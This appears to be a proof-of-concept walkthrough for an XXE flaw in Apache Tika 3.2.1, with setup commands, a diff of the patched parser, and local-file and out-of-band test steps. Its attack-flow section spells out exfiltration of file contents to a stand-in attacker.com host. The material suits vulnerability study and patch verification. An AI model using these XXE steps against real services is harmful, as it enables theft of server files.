Share
## https://sploitus.com/exploit?id=D9B0ECDF-4B8A-5236-88D7-DFA7BB1F80BF
# โš ๏ธ **[READ DISCLAIMER BEFORE USE](DISCLAIMER.md)** โš ๏ธ
**Educational/Authorized Testing Only** | [License](LICENSE) | [Security Policy](SECURITY.md)

---

## Setup POC Directory

```bash
mkdir apache_tika_poc
cd apache_tika_poc
```

## Environment Verification

```bash
# Check Java version
java -version
javac -version

# Check OS version
lsb_release -a
```

## Download Apache Tika JARs

```bash
# Download vulnerable Tika version
wget https://repo1.maven.org/maven2/org/apache/tika/tika-app/3.2.1/tika-app-3.2.1.jar

# Download patched Tika version  
wget https://repo1.maven.org/maven2/org/apache/tika/tika-app/3.2.2/tika-app-3.2.2.jar
```

## Verify Component Versions

```bash
# Check vulnerable version manifest
unzip -p tika-app-3.2.1.jar META-INF/MANIFEST.MF

# Check patched version manifest
unzip -p tika-app-3.2.2.jar META-INF/MANIFEST.MF
```

### List Component POM Properties
If we look at the Project Object Models (Maven's POM properties define a project's dependencies, build configuration, and metadata.), we see there are no separate tika-parsers as mentioned in the security advisories - could be a version related thing and the assumption is in versions 3.2.1 and 3.2.2, which are part of the POC, the tika-parsers module were replaced by individual parser modules.

```bash
# List all component pom.properties files for both versions
unzip -l tika-app-3.2.1.jar | grep pom.properties | grep tika
unzip -l tika-app-3.2.2.jar | grep pom.properties | grep tika
```

### Check Tika Component Versions

```bash
# Check tika-core, tika-parser-pdf-module, and tika-app versions for 3.2.1
unzip -p tika-app-3.2.1.jar META-INF/maven/org.apache.tika/tika-core/pom.properties && echo "---" && unzip -p tika-app-3.2.1.jar META-INF/maven/org.apache.tika/tika-parser-pdf-module/pom.properties && echo "---" && unzip -p tika-app-3.2.1.jar META-INF/maven/org.apache.tika/tika-app/pom.properties

# Check tika-core, tika-parser-pdf-module, and tika-app versions for 3.2.2
unzip -p tika-app-3.2.2.jar META-INF/maven/org.apache.tika/tika-core/pom.properties && echo "---" && unzip -p tika-app-3.2.2.jar META-INF/maven/org.apache.tika/tika-parser-pdf-module/pom.properties && echo "---" && unzip -p tika-app-3.2.2.jar META-INF/maven/org.apache.tika/tika-app/pom.properties
```

## Create Target File for XXE Exploitation

```bash
# Create target secret file
echo "INTERNAL_SERVER_KEY=EXPOSED" > fake-secrets.txt
```

## Code Analysis: Compare Vulnerable vs Patched

```bash
# Extract vulnerable JAR for analysis
mkdir tika-3.2.1-extract && cd tika-3.2.1-extract && unzip -q ../tika-app-3.2.1.jar && cd ..

# Extract patched JAR for analysis
mkdir tika-3.2.2-extract && cd tika-3.2.2-extract && unzip -q ../tika-app-3.2.2.jar && cd ..

# Decompile vulnerable class
cd tika-3.2.1-extract && javap -c org/apache/tika/utils/XMLReaderUtils.class > ../XMLReaderUtils-3.2.1.txt && cd ..

# Decompile patched class
cd tika-3.2.2-extract && javap -c org/apache/tika/utils/XMLReaderUtils.class > ../XMLReaderUtils-3.2.2.txt && cd ..

# Compare versions
diff -u XMLReaderUtils-3.2.1.txt XMLReaderUtils-3.2.2.txt
```

### Identify The Fix
If we compare carefully we find any Doctype definition (DTD) and external Entities support is disabled in 3.2.2 - this is the crux of the fix:

```bash
diff -u XMLReaderUtils-3.2.1.txt XMLReaderUtils-3.2.2.txt | grep -A2 -B2 "accessExternalDTD\|supportDTD\|isSupportingExternalEntities"
```

## POC #1: Local File Read XXE

```bash
# Generate malicious PDF
python3 ./gen_poc.py

# Test with vulnerable Tika 3.2.1
java -jar tika-app-3.2.1.jar -t cve_2025_66516_poc.pdf

# Test with patched Tika 3.2.2
java -jar tika-app-3.2.2.jar -t cve_2025_66516_poc.pdf
```

## POC #2: Out-of-Band XXE

```bash
# Generate out-of-band XXE PDF
python3 ./gen_oob_poc.py

# Start HTTP listener (in separate terminal)
python3 ./http_listener.py

# Test OOB XXE with vulnerable Tika 3.2.1
java -jar tika-app-3.2.1.jar -t cve-2025-66516_OOB_XXE.pdf

# Test OOB XXE with patched Tika 3.2.2  
java -jar tika-app-3.2.2.jar -t cve-2025-66516_OOB_XXE.pdf
```

## Application-Level Testing

```bash
# Compile with vulnerable Tika
javac -cp tika-app-3.2.1.jar DocumentProcessor.java

# Run with vulnerable Tika
java -cp tika-app-3.2.1.jar:. DocumentProcessor ./cve_2025_66516_poc.pdf

# Compile with patched Tika
javac -cp tika-app-3.2.2.jar DocumentProcessor.java

# Run with patched Tika
java -cp tika-app-3.2.2.jar:. DocumentProcessor ./cve_2025_66516_poc.pdf
```

## Cleanup

```bash
# Remove extraction directories
rm -rf tika-3.2.2-extract/
rm -rf tika-3.2.1-extract/
rm XMLReaderUtils-*.txt
```

---

## Understanding the Attack Flow

### Local File System XXE Attack Sequence

1. PDF contains XFA stream with DOCTYPE + ENTITY declaration
2. Tika detects XFA โ†’ calls XFAExtractor
3. XFAExtractor creates XML parser via XMLReaderUtils
4. Parser processes DOCTYPE, registers xxe entity
5. Parser encounters &xxe; reference
6. Parser resolves entity โ†’ reads file:///fake-secrets.txt
7. File contents inserted into XML at &xxe; location
8. XFAExtractor extracts field value = file contents
9. Application receives secret data in Tika output

### Out-of-Band (OOB) XXE Attack Sequence

1. PDF contains XFA with DOCTYPE declaring parameter entities (%file, %dtd)
2. Tika detects XFA โ†’ calls XFAExtractor
3. XFAExtractor creates XML parser via XMLReaderUtils
4. Parser processes DOCTYPE, registers %file entity โ†’ points to file:///fake-secrets.txt
5. Parser encounters %dtd; reference โ†’ points to http://attacker.com:8888/evil.dtd
6. Parser makes HTTP GET request to attacker's server to fetch evil.dtd
7. Attacker's HTTP server receives request, serves evil.dtd content
8. Parser processes evil.dtd: defines %payload entity containing &send definition
9. evil.dtd expands %payload โ†’ creates &send entity with exfiltration URL
10. &send entity contains: http://attacker.com:8888/exfil?data=%file;
11. Parser expands %file; inside &send URL โ†’ file contents inserted
12. Parser resolves &send; entity โ†’ makes HTTP GET to exfiltration endpoint
13. Attacker's HTTP server receives /exfil request with file contents in URL parameter
14. Attacker extracts data from URL parameter, logs secret file contents
15. Application output irrelevant โ†’ data already exfiltrated to attacker's server